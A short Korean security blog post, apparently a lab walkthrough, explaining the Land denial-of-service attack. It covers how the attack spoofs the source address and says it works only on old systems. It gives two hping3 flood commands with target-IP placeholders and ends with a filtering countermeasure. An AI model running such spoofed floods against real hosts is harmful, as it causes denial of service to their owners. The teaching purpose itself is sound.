블로그 내의 모든 예시와 실습은 VMware workstation16.2.3, Kali Linux 2022.03, RED Hat 0.98 version을 활용 합니다.
Land Attack
- 시스템 리소스 공격 -> 메모리 부하, CPU 부하
- Windows95/XP SP2/Server 2003, Linux 2.0.x Kernel 등의 취약점 -> 현재는 공격되지 않는다.
공격 원리
- 연결 요청 메시지의 Source를 공격대상의 주소로 변조하여 공격대상에 응답이 전달되게 한다.
- 다량의 공격 패킷을 전달하여 부하를 유발시키는 공격
공격
- #hping3 -a [공격대상IP] [공격대상IP] –icmp –flood
- #hping3 -a [공격대상IP] [공격대상IP] -s 80 -k -p 80 -S-flood
첫 번째 방법으로 공격
Target IP 확인
kali 공격 (wire shark 실행 후)
kali에서 wire shark 확인
두 번쨰 방법으로 공격
kali 공격 (wire shark 실행 후)
kali에서 wire shark 확인
공격이 잘 성공했다.
보안
- 패킷의 출발지와 목적지 주소가 같을 경우 필터링하여 차단해야 한다.